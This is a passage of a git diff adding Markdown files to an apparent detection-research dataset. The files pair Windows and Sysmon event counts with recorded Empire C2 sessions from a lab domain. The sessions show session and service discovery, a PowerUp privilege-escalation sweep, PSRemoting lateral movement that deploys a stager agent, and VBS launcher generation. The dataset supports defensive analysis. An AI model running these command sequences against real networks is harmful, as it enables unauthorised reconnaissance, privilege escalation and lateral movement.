Privilege Use | 4 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 2 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 1841 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 218 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 174 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 162 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 26 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 21 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 20 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 698 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > info + + Name: Get-NetSession + Module: powershell/situational_awareness/network/powerview/get_session + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Execute the NetSessionEnum Win32API call to query a given + host for active sessions on the host. Part of PowerView. + +Comments: + https://github.com/PowerShellMafia/PowerSploit/blob/dev/Reco + n/ + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + ComputerName False localhost The hostname or IP to query for local + group users. + Agent True H3DKB8SA Agent to run module on. + +(Empire: powershell/situational_awareness/network/powerview/get_session) > set ComputerName HFDC01 +(Empire: powershell/situational_awareness/network/powerview/get_session) > execute +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 19 +[*] Tasked agent H3DKB8SA to run module powershell/situational_awareness/network/powerview/get_session +(Empire: powershell/situational_awareness/network/powerview/get_session) > Job started: VMY6RB + +CName UserName Time IdleTime ComputerName +----- -------- ---- -------- ------------ +\\172.18.39.106 nmartha 1 1 HFDC01 +\\172.18.39.106 pgustavo 352718 55 HFDC01 + +Get-NetSession completed! + +(Empire: powershell/situational_awareness/network/powerview/get_session) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.tar.gz b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.tar.gz new file mode 100644 index 00000000..783329a9 Binary files /dev/null and b/small_datasets/windows/discovery/system_network_connections_discovery_T1049/empire_get_session_local.tar.gz differ diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/README.md b/small_datasets/windows/discovery/system_service_discovery_T1007/README.md new file mode 100644 index 00000000..01a2afc0 --- /dev/null +++ b/small_datasets/windows/discovery/system_service_discovery_T1007/README.md @@ -0,0 +1,10 @@ +# System Service Discovery + +Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net, but adversaries may also use other tools as well. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_net_start](./empire_net_start.md) | 2019-05-18220124 | +| shire | [empire_powerup_al_checks](./empire_powerup_all_checks.md) | 2019-05-18182927 | \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.md b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.md new file mode 100644 index 00000000..df3a2718 --- /dev/null +++ b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.md @@ -0,0 +1,156 @@ +# Empire Net Start + +An adversary can enumerate the services available on the system via net.exe + +## Technique(s) ID + +T1007 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_net_start.tar.gz](./empire_net_start.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18220124 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 283 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 90 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 44 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 12 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 6 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 6 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 3 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 3 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 2 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 1 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 153 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 77 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 52 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 33 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 13 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 3 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 235 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > shell net start +[*] Tasked V6W3TH8Y to run TASK_SHELL +[*] Agent V6W3TH8Y tasked with task ID 8 +(Empire: V6W3TH8Y) > These Windows services are started: + + Application Information + AVCTP service + Background Intelligent Transfer Service + Background Tasks Infrastructure Service + Base Filtering Engine + Certificate Propagation + Clipboard User Service_c5665 + CNG Key Isolation + COM+ Event System + Connected Devices Platform Service + Connected Devices Platform User Service_c5665 + Connected User Experiences and Telemetry + Contact Data_c5665 + CoreMessaging + Credential Manager + Cryptographic Services + Data Sharing Service + Data Usage + DCOM Server Process Launcher + DHCP Client + Diagnostic Policy Service + Diagnostic Service Host + Distributed Link Tracking Client + DNS Client + Geolocation Service + IKE and AuthIP IPsec Keying Modules + IP Helper + IPsec Policy Agent + Local Session Manager + Netlogon + Network Connection Broker + Network List Service + Network Location Awareness + Network Store Interface Service + Plug and Play + Power + Print Spooler + Program Compatibility Assistant Service + Remote Desktop Configuration + Remote Desktop Services + Remote Desktop Services UserMode Port Redirector + Remote Procedure Call (RPC) + RPC Endpoint Mapper + Secondary Logon + Security Accounts Manager + Security Center + Server + Shell Hardware Detection + SSDP Discovery + State Repository Service + Storage Service + Sync Host_c5665 + Sysmon + System Event Notification Service + System Events Broker + System Guard Runtime Monitor Broker + Task Scheduler + TCP/IP NetBIOS Helper + Themes + Time Broker + Touch Keyboard and Handwriting Panel Service + Update Orchestrator Service + User Data Access_c5665 + User Data Storage_c5665 + User Manager + User Profile Service + WarpJITSvc + Web Account Manager + Windows Audio + Windows Audio Endpoint Builder + Windows Connection Manager + Windows Defender Firewall + Windows Event Log + Windows Font Cache Service + Windows License Manager Service + Windows Licensing Monitoring Service + Windows Management Instrumentation + Windows Push Notifications System Service + Windows Push Notifications User Service_c5665 + Windows Remote Management (WS-Management) + Windows Search + Windows Security Service + Windows Time + WinHTTP Web Proxy Auto-Discovery Service + Workstation + +The command completed successfully. + + +..Command execution completed. + +(Empire: V6W3TH8Y) > +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.tar.gz b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.tar.gz new file mode 100644 index 00000000..3f7230ef Binary files /dev/null and b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_net_start.tar.gz differ diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.md b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.md new file mode 100644 index 00000000..c26dc114 --- /dev/null +++ b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.md @@ -0,0 +1,167 @@ +# Empire Powerup All Checks + +Runs all current checks for Windows privesc vectors. + +## Technique(s) ID + +T1007 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_powerup_all_checks.tar.gz](./empire_powerup_all_checks.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18182927 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 2057 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 8 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| System | Service Control Manager | na | 1 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 112 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 106 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 36 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 24 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 17 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 9 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 8 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 7 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 6 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 4 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 235 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 173 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 87 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 59 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 9 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 8 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 5 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 4 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 2022 | + +## Attacker Activity + +``` +(Empire: H3DKB8SA) > usemodule privesc/powerup/allchecks +(Empire: powershell/privesc/powerup/allchecks) > info + + Name: Invoke-AllChecks + Module: powershell/privesc/powerup/allchecks + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: True + OutputExtension: None + +Authors: + @harmj0y + +Description: + Runs all current checks for Windows privesc vectors. + +Comments: + https://github.com/PowerShellEmpire/PowerTools/tree/master/P + owerUp + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Agent True H3DKB8SA Agent to run module on. + +(Empire: powershell/privesc/powerup/allchecks) > execute +[*] Tasked H3DKB8SA to run TASK_CMD_JOB +[*] Agent H3DKB8SA tasked with task ID 1 +[*] Tasked agent H3DKB8SA to run module powershell/privesc/powerup/allchecks +(Empire: powershell/privesc/powerup/allchecks) > Job started: XSHUNF + +[*] Running Invoke-AllChecks + + +[*] Checking if user is in a local group with administrative privileges... +[+] User is in a local group that grants administrative privileges! +[+] Run a BypassUAC attack to elevate privileges to admin. + + +[*] Checking for unquoted service paths... + + +[*] Checking service executable and argument permissions... + + +[*] Checking service permissions... + + +[*] Checking %PATH% for potentially hijackable DLL locations... + + +ModifiablePath : C:\Users\nmartha\AppData\Local\Microsoft\WindowsApps +IdentityReference : SHIRE\nmartha +Permissions : {WriteOwner, Delete, WriteAttributes, Synchronize...} +%PATH% : C:\Users\nmartha\AppData\Local\Microsoft\WindowsApps +AbuseFunction : Write-HijackDll -DllPath 'C:\Users\nmartha\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll' + + + + + +[*] Checking for AlwaysInstallElevated registry key... + + +[*] Checking for Autologon credentials in registry... + + +[*] Checking for modifidable registry autoruns and configs... + + +[*] Checking for modifiable schtask files/configs... + + +[*] Checking for unattended install files... + + +[*] Checking for encrypted web.config strings... + + +[*] Checking for encrypted application pool and virtual directory passwords... + + +[*] Checking for plaintext passwords in McAfee SiteList.xml files.... + + + + +[*] Checking for cached Group Policy Preferences .xml files.... + + +Changed : [BLANK] +UserNames : [BLANK] +NewName : [BLANK] +Passwords : [BLANK] +File : C:\ProgramData\Microsoft\Group + Policy\History\{D0D4B108-2AA4-40A4-AAB2-066DB35CF4A8}\Machine\Preferences\Groups\Groups.xml + +Invoke-AllChecks completed! +``` \ No newline at end of file diff --git a/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.tar.gz b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.tar.gz new file mode 100644 index 00000000..331a0aaa Binary files /dev/null and b/small_datasets/windows/discovery/system_service_discovery_T1007/empire_powerup_all_checks.tar.gz differ diff --git a/small_datasets/windows/execution/powershell_T1086/README.md b/small_datasets/windows/execution/powershell_T1086/README.md new file mode 100644 index 00000000..fbd0b0b6 --- /dev/null +++ b/small_datasets/windows/execution/powershell_T1086/README.md @@ -0,0 +1,9 @@ +# PowerShell + +PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_invoke_psremoting](./empire_invoke_psremoting.md) | 2019-05-18211456 | \ No newline at end of file diff --git a/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.md b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.md new file mode 100644 index 00000000..046811a7 --- /dev/null +++ b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.md @@ -0,0 +1,145 @@ +# Empire Invoke Psremoting + +Executes a stager on remote hosts using PSRemoting. + +## Technique(s) ID + +T1086 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_invoke_psremoting.tar.gz](./empire_invoke_psremoting.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18211456 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------|-------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 850 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 12 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 2 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 288 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 183 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 72 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 35 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 25 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 23 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 19 | +| Security | Microsoft-Windows-Security-Auditing | User Account Management | 16 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 14 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 13 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 13 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 11 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 7 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 6 | +| Security | Microsoft-Windows-Security-Auditing | Other Object Access Events | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Kerberos Service Ticket Operations | 1 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 994 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 795 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 777 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 383 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 255 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 28 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 25 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 21 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 19 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 15 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 6 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 721 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | na | 12 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Connect | 5 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 3 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Stopping Command | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | + +## Attacker Activity + +``` +(Empire: V6W3TH8Y) > usemodule lateral_movement/invoke_psremoting +(Empire: powershell/lateral_movement/invoke_psremoting) > info + + Name: Invoke-PSRemoting + Module: powershell/lateral_movement/invoke_psremoting + NeedsAdmin: False + OpsecSafe: True + Language: powershell +MinLanguageVersion: 2 + Background: False + OutputExtension: None + +Authors: + @harmj0y + +Description: + Executes a stager on remote hosts using PSRemoting. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to use. + CredID False CredID from the store to use. + ComputerName True Host[s] to execute the stager on, comma + separated. + Proxy False default Proxy to use for request (default, none, + or other). + UserName False [domain\]username to use to execute + command. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Password False Password to use to execute command. + Agent True V6W3TH8Y Agent to run module on. + +(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName IT001.shire.com +(Empire: powershell/lateral_movement/invoke_psremoting) > execute +[*] Tasked V6W3TH8Y to run TASK_CMD_WAIT +[*] Agent V6W3TH8Y tasked with task ID 4 +[*] Tasked agent V6W3TH8Y to run module powershell/lateral_movement/invoke_psremoting +(Empire: powershell/lateral_movement/invoke_psremoting) > [*] Sending POWERSHELL stager (stage 1) to 10.0.10.103 +[*] New agent 1NA52YVC checked in +[+] Initial agent 1NA52YVC from 10.0.10.103 now active (Slack) +[*] Sending agent (stage 2) to 1NA52YVC at 10.0.10.103 + +(Empire: powershell/lateral_movement/invoke_psremoting) > agents + +[*] Active agents: + + Name La Internal IP Machine Name Username Process PID Delay Last Seen Listener + ---- -- ----------- ------------ -------- ------- --- ----- --------- ---------------- + H3DKB8SA ps 172.18.39.106 HR001 SHIRE\nmartha powershell 5172 5/0.0 2019-05-18 21:15:55 https + TKV35P8X ps 172.18.39.106 HR001 *SHIRE\nmartha powershell 5452 5/0.0 2019-05-18 21:15:55 https + EMDBFPSY ps 172.18.39.106 HR001 SHIRE\nmartha notepad 7924 5/0.0 2019-05-18 21:15:57 https + + V6W3TH8Y ps 172.18.39.106 HR001 SHIRE\pgustavo powershell 5204 5/0.0 2019-05-18 21:15:31 https + XSZ91N7T ps 172.18.39.105 IT001 *SHIRE\SYSTEM powershell 4172 5/0.0 2019-05-18 21:15:57 https + 1NA52YVC ps 172.18.39.105 IT001 *SHIRE\pgustavo powershell 6884 5/0.0 2019-05-18 21:15:55 https + + +(Empire: agents) > interact 1NA52YVC +(Empire: 1NA52YVC) > shell whoami +[*] Tasked 1NA52YVC to run TASK_SHELL +[*] Agent 1NA52YVC tasked with task ID 1 +(Empire: 1NA52YVC) > shire\pgustavo +..Command execution completed. + +(Empire: 1NA52YVC) > +``` \ No newline at end of file diff --git a/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.tar.gz b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.tar.gz new file mode 100644 index 00000000..fbc4b3fc Binary files /dev/null and b/small_datasets/windows/execution/powershell_T1086/empire_invoke_psremoting.tar.gz differ diff --git a/small_datasets/windows/execution/scripting_T1064/README.md b/small_datasets/windows/execution/scripting_T1064/README.md new file mode 100644 index 00000000..79dda3cd --- /dev/null +++ b/small_datasets/windows/execution/scripting_T1064/README.md @@ -0,0 +1,9 @@ +# Scripting + +Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts. + +## Technique Variations Table + +| Network | Dataset | Updated | +| ------- | --------- | ------- | +| shire | [empire_launcher_vbs](./empire_launcher_vbs.md) | 2019-05-18182022 | \ No newline at end of file diff --git a/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.md b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.md new file mode 100644 index 00000000..ebb05007 --- /dev/null +++ b/small_datasets/windows/execution/scripting_T1064/empire_launcher_vbs.md @@ -0,0 +1,152 @@ +# Empire VBS Launcher + +An adversary can use a VBS script as a launcher for initial access techniques. + +## Technique(s) ID + +T1064 + +## Creators + +Roberto Rodriguez [@Cyb3rWard0g](https://twitter.com/Cyb3rWard0g) + +## Dataset + +[empire_launcher_vbs.tar.gz](./empire_launcher_vbs.tar.gz) + +## Network Environment + +Shire + +## Time Taken + +2019-05-18182022 + +## About this file + +| log_name | source_name | task | record_number | +|--------------------------------------------------------------------|-----------------------------------------------------------|--------------------------------------------------------|-----------------| +| Windows PowerShell | PowerShell | Pipeline Execution Details | 51 | +| Windows PowerShell | PowerShell | Provider Lifecycle | 6 | +| Windows PowerShell | PowerShell | Engine Lifecycle | 1 | +| Security | Microsoft-Windows-Security-Auditing | Filtering Platform Connection | 153 | +| Security | Microsoft-Windows-Security-Auditing | Token Right Adjusted Events | 56 | +| Security | Microsoft-Windows-Security-Auditing | Registry | 42 | +| Security | Microsoft-Windows-Security-Auditing | Sensitive Privilege Use | 30 | +| Security | Microsoft-Windows-Security-Auditing | Process Creation | 14 | +| Security | Microsoft-Windows-Security-Auditing | Handle Manipulation | 12 | +| Security | Microsoft-Windows-Security-Auditing | Group Membership | 11 | +| Security | Microsoft-Windows-Security-Auditing | Logon | 11 | +| Security | Microsoft-Windows-Security-Auditing | Logoff | 8 | +| Security | Microsoft-Windows-Security-Auditing | MPSSVC Rule-Level Policy Change | 8 | +| Security | Microsoft-Windows-Security-Auditing | Process Termination | 6 | +| Security | Microsoft-Windows-Security-Auditing | Special Logon | 5 | +| Security | Microsoft-Windows-Security-Auditing | Authorization Policy Change | 3 | +| Security | Microsoft-Windows-Security-Auditing | Removable Storage | 3 | +| Security | Microsoft-Windows-Security-Auditing | File Share | 2 | +| Security | Microsoft-Windows-Security-Auditing | Detailed File Share | 1 | +| Microsoft-Windows-Windows Firewall With Advanced Security/Firewall | Microsoft-Windows-Windows Firewall With Advanced Security | na | 8 | +| Microsoft-Windows-WMI-Activity/Operational | Microsoft-Windows-WMI-Activity | na | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Image loaded (rule: ImageLoad) | 1001 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process accessed (rule: ProcessAccess) | 987 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry object added or deleted (rule: RegistryEvent) | 961 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Registry value set (rule: RegistryEvent) | 274 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Network connection detected (rule: NetworkConnect) | 89 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File created (rule: FileCreate) | 49 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Connected (rule: PipeEvent) | 24 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process Create (rule: ProcessCreate) | 14 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Process terminated (rule: ProcessTerminate) | 6 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | File creation time changed (rule: FileCreateTime) | 2 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | Pipe Created (rule: PipeEvent) | 1 | +| Microsoft-Windows-Sysmon/Operational | Microsoft-Windows-Sysmon | RawAccessRead detected (rule: RawAccessRead) | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Executing Pipeline | 54 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Console Startup | 2 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Execute a Remote Command | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | PowerShell Named Pipe IPC | 1 | +| Microsoft-Windows-PowerShell/Operational | Microsoft-Windows-PowerShell | Starting Command | 1 | + +## Empire Activity + +``` +usestager windows/launcher_vbs +set Listener https +execute +``` + +``` +(Empire: listeners) > usestager windows/launcher_vbs +(Empire: stager/windows/launcher_vbs) > info + +Name: VBS Launcher + +Description: + Generates a .vbs launcher for Empire. + +Options: + + Name Required Value Description + ---- -------- ------- ----------- + Listener True Listener to generate stager for. + OutFile False /tmp/autoupdate.vbs File to output .vbs launcher to, + otherwise displayed on the screen. + Obfuscate False False Switch. Obfuscate the launcher + powershell code, uses the + ObfuscateCommand for obfuscation types. + For powershell only. + ObfuscateCommand False Token\All\1,Launcher\PS\12467The Invoke-Obfuscation command to use. + Only used if Obfuscate switch is True. + For powershell only. + Language True powershell Language of the stager to generate. + ProxyCreds False default Proxy credentials + ([domain\]username:password) to use for + request (default, none, or other). + UserAgent False default User-agent string to use for the staging + request (default, none, or other). + Proxy False default Proxy to use for request (default, none, + or other). + StagerRetries False 0 Times for the stager to retry + connecting. + + +(Empire: stager/windows/launcher_vbs) > set Listener https +(Empire: 